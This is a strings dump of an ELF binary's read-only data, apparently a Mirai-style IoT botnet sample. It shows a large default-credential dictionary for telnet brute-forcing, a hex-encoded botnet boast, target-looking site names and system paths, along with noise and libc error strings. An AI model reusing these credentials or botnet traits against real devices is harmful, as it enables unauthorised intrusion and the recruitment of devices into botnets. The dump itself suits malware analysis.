267 0x00016c47 0x0805ec47 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
268 0x00016c7d 0x0805ec7d 4   5    .rodata ascii   <Q4F
269 0x00016c95 0x0805ec95 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
270 0x00016ca9 0x0805eca9 4   5    .rodata ascii   PB4w
271 0x00016caf 0x0805ecaf 4   5    .rodata ascii   *oB4
272 0x00016cbb 0x0805ecbb 4   5    .rodata ascii   <QwQ
273 0x00016cc9 0x0805ecc9 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
274 0x00016d08 0x0805ed08 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
275 0x00016d15 0x0805ed15 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
276 0x00016d21 0x0805ed21 4   5    .rodata ascii   *oB4
277 0x00016d2d 0x0805ed2d 4   5    .rodata ascii   <QwQ
278 0x00016d3b 0x0805ed3b 7   9    .rodata utf8    *4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
279 0x00016d63 0x0805ed63 4   5    .rodata ascii   PP4F
280 0x00016d7b 0x0805ed7b 4   6    .rodata utf8    'ϗP\e blocks=Basic Latin,Greek and Coptic
281 0x00016d92 0x0805ed92 8   11   .rodata utf8    Q4\tF4ⴆ4< blocks=Basic Latin,Georgian Supplement
282 0x00016d9d 0x0805ed9d 4   5    .rodata ascii   xQ4b
283 0x00016da3 0x0805eda3 8   9    .rodata ascii   4\tF4^B4Q
284 0x00016db4 0x0805edb4 4   5    .rodata ascii   <QwQ
285 0x00016dc5 0x0805edc5 7   9    .rodata utf8    P4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
286 0x00016ded 0x0805eded 5   6    .rodata ascii   <Q'G5
287 0x00016e18 0x0805ee18 7   10   .rodata utf8    'ϗP4א<Q blocks=Basic Latin,Greek and Coptic,Hebrew
288 0x00016e6a 0x0805ee6a 6   8    .rodata utf8    'ϗP4F< blocks=Basic Latin,Greek and Coptic
289 0x00016e7d 0x0805ee7d 4   5    .rodata ascii   G4\e^
290 0x00016e92 0x0805ee92 5   6    .rodata ascii   *oB4Q
291 0x00016ea0 0x0805eea0 4   5    .rodata ascii   <QwQ
292 0x00016eae 0x0805eeae 6   8    .rodata utf8    4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
293 0x00016edd 0x0805eedd 7   11   .rodata utf8    'ϗP4\eιԠ blocks=Basic Latin,Greek and Coptic,Cyrillic Supplement
294 0x00016eeb 0x0805eeeb 4   5    .rodata ascii   <QB4
295 0x00016f36 0x0805ef36 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
296 0x00016f4f 0x0805ef4f 4   7    .rodata utf8    4ٰ4ϗ blocks=Basic Latin,Arabic,Greek and Coptic
297 0x00016f5f 0x0805ef5f 4   5    .rodata ascii   <QwQ
298 0x00016f88 0x0805ef88 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
299 0x00016f9c 0x0805ef9c 10  11   .rodata ascii   PB4w\tw*oB4
300 0x00016fd2 0x0805efd2 6   8    .rodata utf8    'ϗP4\e^ blocks=Basic Latin,Greek and Coptic
301 0x00016fed 0x0805efed 4   6    .rodata utf8    ܼFB4 blocks=Syriac,Basic Latin
302 0x00017025 0x0805f025 7   11   .rodata utf8    'ϗP4\eιԠ blocks=Basic Latin,Greek and Coptic,Cyrillic Supplement
303 0x00017033 0x0805f033 4   5    .rodata ascii   <QB4
304 0x00017044 0x0805f044 7   8    .rodata ascii   *B4F"<<
305 0x00017054 0x0805f054 4   5    .rodata ascii   <QwQ
306 0x00017061 0x0805f061 6   8    .rodata utf8    4\eLðb\ blocks=Basic Latin,Latin-1 Supplement
307 0x0001707d 0x0805f07d 6   8    .rodata utf8    'ϗP4\eb blocks=Basic Latin,Greek and Coptic
308 0x00017093 0x0805f093 5   6    .rodata ascii   9Q<4b
309 0x0001709a 0x0805f09a 8   9    .rodata ascii   4\tF4^B4Q
310 0x000170d5 0x0805f0d5 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
311 0x000170ee 0x0805f0ee 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
312 0x00017115 0x0805f115 6   8    .rodata utf8    'ϗP4\e^ blocks=Basic Latin,Greek and Coptic
313 0x0001715a 0x0805f15a 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
314 0x00017173 0x0805f173 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
315 0x000171b5 0x0805f1b5 5   8    .rodata utf8    P4\eιԠ blocks=Basic Latin,Greek and Coptic,Cyrillic Supplement
316 0x000171c0 0x0805f1c0 7   8    .rodata ascii   <QB4bFh
317 0x000171cb 0x0805f1cb 4   5    .rodata ascii   PB4w
318 0x000171d5 0x0805f1d5 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
319 0x000171db 0x0805f1db 6   7    .rodata ascii   PB4b"h
320 0x000171e3 0x0805f1e3 4   5    .rodata ascii   B4F\
321 0x000171fd 0x0805f1fd 6   7    .rodata ascii   GB4bQa
322 0x0001721c 0x0805f21c 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
323 0x00017238 0x0805f238 4   5    .rodata ascii   PB4F
324 0x00017273 0x0805f273 6   8    .rodata utf8    'ϗP4\e^ blocks=Basic Latin,Greek and Coptic
325 0x0001728a 0x0805f28a 4   5    .rodata ascii   *B4Q
326 0x0001728f 0x0805f28f 4   6    .rodata utf8    ܼFB4 blocks=Syriac,Basic Latin
327 0x000172ad 0x0805f2ad 5   7    .rodata utf8    G4א<Q blocks=Basic Latin,Hebrew
328 0x000172c3 0x0805f2c3 5   7    .rodata utf8    'ϗP4\e blocks=Basic Latin,Greek and Coptic
329 0x000172e5 0x0805f2e5 6   8    .rodata utf8    'ϗP4\e^ blocks=Basic Latin,Greek and Coptic
330 0x000172fa 0x0805f2fa 4   5    .rodata ascii   *oB4
331 0x00017340 0x0805f340 6   8    .rodata utf8    'ϗP4\ew blocks=Basic Latin,Greek and Coptic
332 0x0001734d 0x0805f34d 4   6    .rodata utf8    4ٰ4* blocks=Basic Latin,Arabic
333 0x00017354 0x0805f354 7   8    .rodata ascii   B4w\tw*o
334 0x0001735c 0x0805f35c 4   5    .rodata ascii   4Fx"
335 0x00017372 0x0805f372 4   5    .rodata ascii   QZ'P
336 0x00017379 0x0805f379 4   5    .rodata ascii   root
337 0x0001737e 0x0805f37e 8   9    .rodata ascii   zyad1234
338 0x0001738d 0x0805f38d 4   5    .rodata ascii   pass
339 0x00017392 0x0805f392 6   7    .rodata ascii   dvrdvs
340 0x00017399 0x0805f399 6   7    .rodata ascii   nvalid
341 0x000173a0 0x0805f3a0 8   9    .rodata ascii   ncorrect
342 0x000173a9 0x0805f3a9 5   6    .rodata ascii   enied
343 0x000173af 0x0805f3af 7   8    .rodata ascii   goodbye
344 0x000173bb 0x0805f3bb 7   8    .rodata ascii   timeout
345 0x000173ca 0x0805f3ca 6   7    .rodata ascii   usybox
346 0x000173e6 0x0805f3e6 88  89   .rodata ascii   6861692072616E736F6D6520697473206D6520686F70652075206C69656B206D79206E657720626F746E6574
347 0x00017485 0x0805f485 4   5    .rodata ascii   *oGo
348 0x000174aa 0x0805f4aa 4   5    .rodata ascii   oo*o
349 0x000174f9 0x0805f4f9 5   6    .rodata ascii   *oG*G
350 0x0001750c 0x0805f50c 5   6    .rodata ascii   *oG*G
351 0x00017516 0x0805f516 5   6    .rodata ascii   GPGP*
352 0x0001760f 0x0805f60f 5   6    .rodata ascii   P**GP
353 0x00017624 0x0805f624 5   6    .rodata ascii   *G*G*
354 0x0001764c 0x0805f64c 7   8    .rodata ascii   *GGo***
355 0x000176a1 0x0805f6a1 7   8    .rodata ascii   Go*o***
356 0x000176b2 0x0805f6b2 7   8    .rodata ascii   *oGP***
357 0x000176c5 0x0805f6c5 5   6    .rodata ascii   GP***
358 0x000176d4 0x0805f6d4 9   10   .rodata ascii   GoGoGP***
359 0x000176f1 0x0805f6f1 6   8    .rodata utf8    *φP*** blocks=Basic Latin,Greek and Coptic
360 0x0001777f 0x0805f77f 4   7    .rodata utf8    Go⤆P blocks=Basic Latin,Supplemental Arrows-B
361 0x000177c7 0x0805f7c7 5   6    .rodata ascii   oGoGo
362 0x000177f4 0x0805f7f4 5   6    .rodata ascii   GP*GG
363 0x00017813 0x0805f813 4   6    .rodata utf8    *͆P* blocks=Basic Latin,Combining Diacritical Marks
364 0x00017828 0x0805f828 13  14   .rodata ascii   /lib/systemd/
365 0x00017836 0x0805f836 16  17   .rodata ascii   /usr/lib/systemd
366 0x00017847 0x0805f847 19  20   .rodata ascii   /system/system/bin/
367 0x0001785b 0x0805f85b 8   9    .rodata ascii   /gm/bin/
368 0x00017864 0x0805f864 9   10   .rodata ascii   /mnt/mtd/
369 0x0001786e 0x0805f86e 10  11   .rodata ascii   /usr/sbin/
370 0x00017879 0x0805f879 8   9    .rodata ascii   /z/zbin/
371 0x00017882 0x0805f882 8   9    .rodata ascii   /usr/bin
372 0x0001788b 0x0805f88b 8   9    .rodata ascii   /usr/lib
373 0x00017894 0x0805f894 5   6    .rodata ascii   /sys/
374 0x0001789a 0x0805f89a 8   9    .rodata ascii   /system/
375 0x000178a3 0x0805f8a3 14  15   .rodata ascii   /root/dvr_gui/
376 0x000178b2 0x0805f8b2 14  15   .rodata ascii   /root/dvr_app/
377 0x000178c1 0x0805f8c1 10  11   .rodata ascii   /anko-app/
378 0x000178cc 0x0805f8cc 5   6    .rodata ascii   /mnt/
379 0x000178d2 0x0805f8d2 5   6    .rodata ascii   /opt/
380 0x000178d8 0x0805f8d8 5   6    .rodata ascii   /dvr/
381 0x000178de 0x0805f8de 9   10   .rodata ascii   /z/zwave/
382 0x000178e8 0x0805f8e8 9   10   .rodata ascii   /z/secom/
383 0x000178f2 0x0805f8f2 5   6    .rodata ascii   close
384 0x000178f8 0x0805f8f8 10  11   .rodata ascii   keep-alive
385 0x00017932 0x0805f932 7   8    .rodata ascii   \a\b\t\n\v\f\r
386 0x0001797b 0x0805f97b 19  20   .rodata ascii   example.ulfheim.net
387 0x00017a11 0x0805fa11 4   5    .rodata ascii   root
388 0x00017a17 0x0805fa17 5   6    .rodata ascii   admin
389 0x00017a1e 0x0805fa1e 7   8    .rodata ascii   default
390 0x00017a27 0x0805fa27 7   8    .rodata ascii   support
391 0x00017a30 0x0805fa30 4   5    .rodata ascii   user
392 0x00017a36 0x0805fa36 13  14   .rodata ascii   administrator
393 0x00017a45 0x0805fa45 7   8    .rodata ascii   service
394 0x00017a4e 0x0805fa4e 10  11   .rodata ascii   supervisor
395 0x00017a5a 0x0805fa5a 5   6    .rodata ascii   guest
396 0x00017a61 0x0805fa61 6   7    .rodata ascii   admin1
397 0x00017a69 0x0805fa69 6   7    .rodata ascii   666666
398 0x00017a71 0x0805fa71 6   7    .rodata ascii   888888
399 0x00017a79 0x0805fa79 4   5    .rodata ascii   ubnt
400 0x00017a7f 0x0805fa7f 5   6    .rodata ascii   quser
401 0x00017a86 0x0805fa86 4   5    .rodata ascii   tech
402 0x00017a8c 0x0805fa8c 7   8    .rodata ascii   Manager
403 0x00017a9a 0x0805fa9a 7   8    .rodata ascii   manager
404 0x00017aa8 0x0805faa8 6   7    .rodata ascii   ascend
405 0x00017ab2 0x0805fab2 6   7    .rodata ascii   D-Link
406 0x00017aba 0x0805faba 5   6    .rodata ascii   dlink
407 0x00017ac1 0x0805fac1 5   6    .rodata ascii   login
408 0x00017ac8 0x0805fac8 6   7    .rodata ascii    !root
409 0x00017ad0 0x0805fad0 8   9    .rodata ascii   cablecom
410 0x00017ada 0x0805fada 7   8    .rodata ascii   netopia
411 0x00017ae3 0x0805fae3 6   7    .rodata ascii   sysadm
412 0x00017aeb 0x0805faeb 5   6    .rodata ascii   debug
413 0x00017af2 0x0805faf2 4   5    .rodata ascii   echo
414 0x00017af8 0x0805faf8 4   5    .rodata ascii   diag
415 0x00017b02 0x0805fb02 6   7    .rodata ascii   telnet
416 0x00017b0a 0x0805fb0a 7   8    .rodata ascii   netgear
417 0x00017b13 0x0805fb13 5   6    .rodata ascii   vt100
418 0x00017b1f 0x0805fb1f 6   7    .rodata ascii   vyatta
419 0x00017b27 0x0805fb27 6   7    .rodata ascii   micros
420 0x00017b2f 0x0805fb2f 5   6    .rodata ascii   setup
421 0x00017b36 0x0805fb36 7   8    .rodata ascii   comcast
422 0x00017b49 0x0805fb49 4   5    .rodata ascii   2800
423 0x00017b4f 0x0805fb4f 4   5    .rodata ascii   UBNT
424 0x00017b55 0x0805fb55 6   7    .rodata ascii   netman
425 0x00017b5d 0x0805fb5d 6   7    .rodata ascii   daemon
426 0x00017b65 0x0805fb65 4   5    .rodata ascii   demo
427 0x00017b6b 0x0805fb6b 5   6    .rodata ascii   arris
428 0x00017b72 0x0805fb72 7   8    .rodata ascii   Linksys
429 0x00017b7b 0x0805fb7b 6   7    .rodata ascii   client
430 0x00017b83 0x0805fb83 5   6    .rodata ascii   cisco
431 0x00017b8a 0x0805fb8a 5   6    .rodata ascii   super
432 0x00017b91 0x0805fb91 7   8    .rodata ascii   7654321
433 0x00017b9a 0x0805fb9a 4   5    .rodata ascii   adsl
434 0x00017ba0 0x0805fba0 6   7    .rodata ascii   patrol
435 0x00017ba8 0x0805fba8 6   7    .rodata ascii   mg3500
436 0x00017bb0 0x0805fbb0 11  12   .rodata ascii   bbsd-client
437 0x00017bbd 0x0805fbbd 8   9    .rodata ascii   adminttd
438 0x00017bc7 0x0805fbc7 8   9    .rodata ascii   operator
439 0x00017bd1 0x0805fbd1 8   9    .rodata ascii   PlcmSpIp
440 0x00017bdb 0x0805fbdb 8   9    .rodata ascii   11111111
441 0x00017be5 0x0805fbe5 8   9    .rodata ascii   22222222
442 0x00017bef 0x0805fbef 8   9    .rodata ascii   security
443 0x00017bf9 0x0805fbf9 8   9    .rodata ascii   mountsys
444 0x00017c03 0x0805fc03 7   8    .rodata ascii   memotec
445 0x00017c0c 0x0805fc0c 9   10   .rodata ascii   museadmin
446 0x00017c17 0x0805fc17 9   10   .rodata ascii   storwatch
447 0x00017c22 0x0805fc22 9   10   .rodata ascii   adminpldt
448 0x00017c2d 0x0805fc2d 9   10   .rodata ascii   pldtadmin
449 0x00017c38 0x0805fc38 12  13   .rodata ascii   telecomadmin
450 0x00017c46 0x0805fc46 6   7    .rodata ascii   xc3511
451 0x00017c4e 0x0805fc4e 5   6    .rodata ascii   vizxv
452 0x00017c55 0x0805fc55 7   8    .rodata ascii   xmhdipc
453 0x00017c5e 0x0805fc5e 8   9    .rodata ascii   juantech
454 0x00017c68 0x0805fc68 6   7    .rodata ascii   123456
455 0x00017c70 0x0805fc70 5   6    .rodata ascii   54321
456 0x00017c77 0x0805fc77 4   5    .rodata ascii   1234
457 0x00017c7d 0x0805fc7d 8   9    .rodata ascii   password
458 0x00017c87 0x0805fc87 5   6    .rodata ascii   12345
459 0x00017c8e 0x0805fc8e 4   5    .rodata ascii   pass
460 0x00017c94 0x0805fc94 9   10   .rodata ascii   admin1234
461 0x00017c9f 0x0805fc9f 4   5    .rodata ascii   1111
462 0x00017ca5 0x0805fca5 8   9    .rodata ascii   smcadmin
463 0x00017caf 0x0805fcaf 6   7    .rodata ascii   klv123
464 0x00017cbc 0x0805fcbc 6   7    .rodata ascii   public
465 0x00017cc4 0x0805fcc4 7   8    .rodata ascii   klv1234
466 0x00017ccd 0x0805fccd 6   7    .rodata ascii   Zte521
467 0x00017cd5 0x0805fcd5 6   7    .rodata ascii   hi3518
468 0x00017cdd 0x0805fcdd 5   6    .rodata ascii   jvbzd
469 0x00017ce4 0x0805fce4 4   5    .rodata ascii   anko
470 0x00017cea 0x0805fcea 5   6    .rodata ascii   zlxx.
471 0x00017cf1 0x0805fcf1 8   9    .rodata ascii   changeme
472 0x00017cfb 0x0805fcfb 12  13   .rodata ascii   7ujMko0vizxv
473 0x00017d09 0x0805fd09 12  13   .rodata ascii   7ujMko0admin
474 0x00017d17 0x0805fd17 6   7    .rodata ascii   system
475 0x00017d1f 0x0805fd1f 4   5    .rodata ascii   ikwb
476 0x00017d25 0x0805fd25 8   9    .rodata ascii   dreambox
477 0x00017d2f 0x0805fd2f 7   8    .rodata ascii   realtek
478 0x00017d38 0x0805fd38 8   9    .rodata ascii   00000000
479 0x00017d42 0x0805fd42 6   7    .rodata ascii   000000
480 0x00017d4a 0x0805fd4a 7   8    .rodata ascii   1111111
481 0x00017d53 0x0805fd53 8   9    .rodata ascii   admin123
482 0x00017d5d 0x0805fd5d 6   7    .rodata ascii   meinsm
483 0x00017d65 0x0805fd65 8   9    .rodata ascii   99999999
484 0x00017d6f 0x0805fd6f 5   6    .rodata ascii   Meins
485 0x00017d7b 0x0805fd7b 4   5    .rodata ascii   4321
486 0x00017d81 0x0805fd81 6   7    .rodata ascii   utstar
487 0x00017d89 0x0805fd89 8   9    .rodata ascii   zoomadsl
488 0x00017d93 0x0805fd93 4   5    .rodata ascii   ip20
489 0x00017d99 0x0805fd99 6   7    .rodata ascii   ip3000
490 0x00017da1 0x0805fda1 5   6    .rodata ascii   ip400
491 0x00017da8 0x0805fda8 6   7    .rodata ascii   bintec
492 0x00017db0 0x0805fdb0 7   8    .rodata ascii   tsunami
493 0x00017db9 0x0805fdb9 6   7    .rodata ascii   abc123
494 0x00017dc1 0x0805fdc1 6   7    .rodata ascii   2601hx
495 0x00017dc9 0x0805fdc9 6   7    .rodata ascii   synnet
496 0x00017dd1 0x0805fdd1 8   9    .rodata ascii   bayandsl
497 0x00017de0 0x0805fde0 7   8    .rodata ascii   1234567
498 0x00017de9 0x0805fde9 6   7    .rodata ascii   friend
499 0x00017df1 0x0805fdf1 10  11   .rodata ascii   oelinux123
500 0x00017dfd 0x0805fdfd 4   5    .rodata ascii   tini
501 0x00017e03 0x0805fe03 6   7    .rodata ascii   router
502 0x00017e0b 0x0805fe0b 7   8    .rodata ascii   anicust
503 0x00017e14 0x0805fe14 9   10   .rodata ascii   d.e.b.u.g
504 0x00017e1f 0x0805fe1f 6   7    .rodata ascii   switch
505 0x00017e27 0x0805fe27 10  11   .rodata ascii   1234567890
506 0x00017e33 0x0805fe33 4   5    .rodata ascii   toor
507 0x00017e39 0x0805fe39 6   7    .rodata ascii   calvin
508 0x00017e41 0x0805fe41 8   9    .rodata ascii   1234qwer
509 0x00017e4b 0x0805fe4b 7   8    .rodata ascii   root123
510 0x00017e54 0x0805fe54 8   9    .rodata ascii   ahetzip8
511 0x00017e5e 0x0805fe5e 6   7    .rodata ascii   696969
512 0x00017e66 0x0805fe66 8   9    .rodata ascii   pa55w0rd
513 0x00017e70 0x0805fe70 6   7    .rodata ascii   123123
514 0x00017e78 0x0805fe78 7   8    .rodata ascii   root500
515 0x00017e81 0x0805fe81 6   7    .rodata ascii   alpine
516 0x00017e89 0x0805fe89 7   8    .rodata ascii   zte9x15
517 0x00017e92 0x0805fe92 8   9    .rodata ascii   b120root
518 0x00017e9c 0x0805fe9c 8   9    .rodata ascii   PASSWORD
519 0x00017ea6 0x0805fea6 6   7    .rodata ascii   atc456
520 0x00017eae 0x0805feae 5   6    .rodata ascii   CISCO
521 0x00017eb5 0x0805feb5 4   5    .rodata ascii   surt
522 0x00017ebb 0x0805febb 8   9    .rodata ascii   adsl1234
523 0x00017ec5 0x0805fec5 6   7    .rodata ascii   merlin
524 0x00017ecd 0x0805fecd 8   9    .rodata ascii   netadmin
525 0x00017ed7 0x0805fed7 8   9    .rodata ascii   hewlpack
526 0x00017ee1 0x0805fee1 6   7    .rodata ascii   NetICs
527 0x00017ee9 0x0805fee9 4   5    .rodata ascii   NULL
528 0x00017eef 0x0805feef 13  14   .rodata ascii   LSiuY7pOmZG2s
529 0x00017efe 0x0805fefe 14  15   .rodata ascii   3UJUh2VemEfUte
530 0x00017f0e 0x0805ff0e 10  11   .rodata ascii   Muse!admin
531 0x00017f1a 0x0805ff1a 10  11   .rodata ascii   specialist
532 0x00017f26 0x0805ff26 9   10   .rodata ascii   changeme2
533 0x00017f31 0x0805ff31 12  13   .rodata ascii   admintelecom
534 0x00017f3f 0x0805ff3f 6   7    .rodata ascii   xc3611
535 0x00017f47 0x0805ff47 6   7    .rodata ascii   antslq
536 0x00017f4f 0x0805ff4f 8   9    .rodata ascii   zyad1234
537 0x00017f69 0x0805ff69 14  15   .rodata ascii   \a\b\t:;<=>?@\n\v\f\r
538 0x00017f79 0x0805ff79 4   5    .rodata ascii   %s%s
539 0x00017f8c 0x0805ff8c 6   7    .rodata ascii   google
540 0x00017f9c 0x0805ff9c 4   5    .rodata ascii   %s%s
541 0x00017fab 0x0805ffab 4   5    .rodata ascii   live
542 0x00017fb9 0x0805ffb9 4   5    .rodata ascii   %s%s
543 0x00017fc8 0x0805ffc8 6   7    .rodata ascii   office
544 0x00017fd8 0x0805ffd8 4   5    .rodata ascii   %s%s
545 0x00017fe6 0x0805ffe6 9   10   .rodata ascii   \bdigikala
546 0x00017ff9 0x0805fff9 4   5    .rodata ascii   %s%s
547 0x00018007 0x08060007 11  12   .rodata ascii   \nsalesforce
548 0x0001801c 0x0806001c 4   5    .rodata ascii   %s%s
549 0x0001802b 0x0806002b 5   6    .rodata ascii   sogou
550 0x0001803a 0x0806003a 4   5    .rodata ascii   %s%s
551 0x00018048 0x08060048 8   9    .rodata ascii   \adiscord
552 0x0001805a 0x0806005a 4   5    .rodata ascii   %s%s
553 0x00018068 0x08060068 8   9    .rodata ascii   \awikihow
554 0x0001807a 0x0806007a 4   5    .rodata ascii   %s%s
555 0x00018089 0x08060089 14  15   .rodata ascii   manoramaonline
556 0x0001812f 0x0806012f 8   9    .rodata ascii   \b%s%s%m\n
557 0x00018150 0x08060150 5   6    .rodata ascii   (nil)
558 0x00018165 0x08060165 12  13   .rodata ascii   \b\n\n\nhlLjztqZ
559 0x000181a7 0x080601a7 20  21   .rodata ascii   npxXoudifFeEgGaACScs
560 0x000181bc 0x080601bc 7   8    .rodata ascii    +0-#'I
561 0x000181e8 0x080601e8 14  15   .rodata ascii   Unknown error 
562 0x00018200 0x08060200 7   8    .rodata ascii   Success
563 0x00018208 0x08060208 23  24   .rodata ascii   Operation not permitted
564 0x00018220 0x08060220 25  26   .rodata ascii   No such file or directory
565 0x0001823a 0x0806023a 15  16   .rodata ascii   No such process
566 0x0001824a 0x0806024a 23  24   .rodata ascii   Interrupted system call
567 0x00018262 0x08060262 18  19   .rodata ascii   Input/output error
568 0x00018275 0x08060275 25  26   .rodata ascii   No such device or address
569 0x0001828f 0x0806028f 22  23   .rodata ascii   Argument list too long
570 0x000182a6 0x080602a6 17  18   .rodata ascii   Exec format error
571 0x000182b8 0x080602b8 19  20   .rodata ascii   Bad file descriptor
572 0x000182cc 0x080602cc 18  19   .rodata ascii   No child processes
573 0x000182df 0x080602df 32  33   .rodata ascii   Resource temporarily unavailable
574 0x00018300 0x08060300 22  23   .rodata ascii   Cannot allocate memory
575 0x00018317 0x08060317 17  18   .rodata ascii   Permission denied
576 0x00018329 0x08060329 11  12   .rodata ascii   Bad address
577 0x00018335 0x08060335 21  22   .rodata ascii   Block device required
578 0x0001834b 0x0806034b 23  24   .rodata ascii   Device or resource busy
579 0x00018363 0x08060363 11  12   .rodata ascii   File exists
580 0x0001836f 0x0806036f 25  26   .rodata ascii   Invalid cross-device link
581 0x00018389 0x08060389 14  15   .rodata ascii   No such device
582 0x00018398 0x08060398 15  16   .rodata ascii   Not a directory
583 0x000183a8 0x080603a8 14  15   .rodata ascii   Is a directory
584 0x000183b7 0x080603b7 16  17   .rodata ascii   Invalid argument
585 0x000183c8 0x080603c8 29  30   .rodata ascii   Too many open files in system
586 0x000183e6 0x080603e6 19  20   .rodata ascii   Too many open files
587 0x000183fa 0x080603fa 30  31   .rodata ascii   Inappropriate ioctl for device
588 0x00018419 0x08060419 14  15   .rodata ascii   Text file busy
589 0x00018428 0x08060428 14  15   .rodata ascii   File too large
590 0x00018437 0x08060437 23  24   .rodata ascii   No space left on device
591 0x0001844f 0x0806044f 12  13   .rodata ascii   Illegal seek
592 0x0001845c 0x0806045c 21  22   .rodata ascii   Read-only file system
593 0x00018472 0x08060472 14  15   .rodata ascii   Too many links
594 0x00018481 0x08060481 11  12   .rodata ascii   Broken pipe
595 0x0001848d 0x0806048d 32  33   .rodata ascii   Numerical argument out of domain
596 0x000184ae 0x080604ae 29  30   .rodata ascii   Numerical result out of range
597 0x000184cc 0x080604cc 25  26   .rodata ascii   Resource deadlock avoided
598 0x000184e6 0x080604e6 18  19   .rodata ascii   File name too long
599 0x000184f9 0x080604f9 18  19   .rodata ascii   No locks available
600 0x0001850c 0x0806050c 24  25   .rodata ascii   Function not implemented
601 0x00018525 0x08060525 19  20   .rodata ascii   Directory not empty
602 0x00018539 0x08060539 33  34   .rodata ascii   Too many levels of symbolic links
603 0x0001855c 0x0806055c 26  27   .rodata ascii   No message of desired type
604 0x00018577 0x08060577 18  19   .rodata ascii   Identifier removed
605 0x0001858a 0x0806058a 27  28   .rodata ascii   Channel number out of range
606 0x000185a6 0x080605a6 24  25   .rodata ascii   Level 2 not synchronized
607 0x000185bf 0x080605bf 14  15   .rodata ascii   Level 3 halted
608 0x000185ce 0x080605ce 13  14   .rodata ascii   Level 3 reset
609 0x000185dc 0x080605dc 24  25   .rodata ascii   Link number out of range
610 0x000185f5 0x080605f5 28  29   .rodata ascii   Protocol driver not attached
611 0x00018612 0x08060612 26  27   .rodata ascii   No CSI structure available
612 0x0001862d 0x0806062d 14  15   .rodata ascii   Level 2 halted
613 0x0001863c 0x0806063c 16  17   .rodata ascii   Invalid exchange
614 0x0001864d 0x0806064d 26  27   .rodata ascii   Invalid request descriptor
615 0x00018668 0x08060668 13  14   .rodata ascii   Exchange full
616 0x00018676 0x08060676 8   9    .rodata ascii   No anode
617 0x0001867f 0x0806067f 20  21   .rodata ascii   Invalid request code
618 0x00018694 0x08060694 12  13   .rodata ascii   Invalid slot
619 0x000186a2 0x080606a2 20  21   .rodata ascii   Bad font file format
620 0x000186b7 0x080606b7 19  20   .rodata ascii   Device not a stream
621 0x000186cb 0x080606cb 17  18   .rodata ascii   No data available
622 0x000186dd 0x080606dd 13  14   .rodata ascii   Timer expired
623 0x000186eb 0x080606eb 24  25   .rodata ascii   Out of streams resources
624 0x00018704 0x08060704 29  30   .rodata ascii   Machine is not on the network
625 0x00018722 0x08060722 21  22   .rodata ascii   Package not installed
626 0x00018738 0x08060738 16  17   .rodata ascii   Object is remote
627 0x00018749 0x08060749 21  22   .rodata ascii   Link has been severed
628 0x0001875f 0x0806075f 15  16   .rodata ascii   Advertise error
629 0x0001876f 0x0806076f 13  14   .rodata ascii   Srmount error
630 0x0001877d 0x0806077d 27  28   .rodata ascii   Communication error on send
631 0x00018799 0x08060799 14  15   .rodata ascii   Protocol error
632 0x000187a8 0x080607a8 18  19   .rodata ascii   Multihop attempted
633 0x000187bb 0x080607bb 18  19   .rodata ascii   RFS specific error
634 0x000187ce 0x080607ce 11  12   .rodata ascii   Bad message
635 0x000187da 0x080607da 37  38   .rodata ascii   Value too large for defined data type
636 0x00018800 0x08060800 26  27   .rodata ascii   Name not unique on network
637 0x0001881b 0x0806081b 28  29   .rodata ascii   File descriptor in bad state
638 0x00018838 0x08060838 22  23   .rodata ascii   Remote address changed
639 0x0001884f 0x0806084f 38  39   .rodata ascii   Can not access a needed shared library
640 0x00018876 0x08060876 36  37   .rodata ascii   Accessing a corrupted shared library
641 0x0001889b 0x0806089b 31  32   .rodata ascii   .lib section in a.out corrupted
642 0x000188bb 0x080608bb 47  48   .rodata ascii   Attempting to link in too many shared libraries
643 0x000188eb 0x080608eb 37  38   .rodata ascii   Cannot exec a shared library directly
644 0x00018911 0x08060911 49  50   .rodata ascii   Invalid or incomplete multibyte or wide character
645 0x00018943 0x08060943 43  44   .rodata ascii   Interrupted system call should be restarted
646 0x0001896f 0x0806096f 18  19   .rodata ascii   Streams pipe error
647 0x00018982 0x08060982 14  15   .rodata ascii   Too many users
648 0x00018991 0x08060991 30  31   .rodata ascii   Socket operation on non-socket
649 0x000189b0 0x080609b0 28  29   .rodata ascii   Destination address required
650 0x000189cd 0x080609cd 16  17   .rodata ascii   Message too long
651 0x000189de 0x080609de 30  31   .rodata ascii   Protocol wrong type for socket
652 0x000189fd 0x080609fd 22  23   .rodata ascii   Protocol not available
653 0x00018a14 0x08060a14 22  23   .rodata ascii   Protocol not supported
654 0x00018a2b 0x08060a2b 25  26   .rodata ascii   Socket type not supported
655 0x00018a45 0x08060a45 23  24   .rodata ascii   Operation not supported
656 0x00018a5d 0x08060a5d 29  30   .rodata ascii   Protocol family not supported
657 0x00018a7b 0x08060a7b 40  41   .rodata ascii   Address family not supported by protocol
658 0x00018aa4 0x08060aa4 22  23   .rodata ascii   Address already in use
659 0x00018abb 0x08060abb 31  32   .rodata ascii   Cannot assign requested address
660 0x00018adb 0x08060adb 15  16   .rodata ascii   Network is down
661 0x00018aeb 0x08060aeb 22  23   .rodata ascii   Network is unreachable
662 0x00018b02 0x08060b02 35  36   .rodata ascii   Network dropped connection on reset
663 0x00018b26 0x08060b26 32  33   .rodata ascii   Software caused connection abort
664 0x00018b47 0x08060b47 24  25   .rodata ascii   Connection reset by peer
665 0x00018b60 0x08060b60 25  26   .rodata ascii   No buffer space available
666 0x00018b7a 0x08060b7a 39  40   .rodata ascii   Transport endpoint is already connected
667 0x00018ba2 0x08060ba2 35  36   .rodata ascii   Transport endpoint is not connected
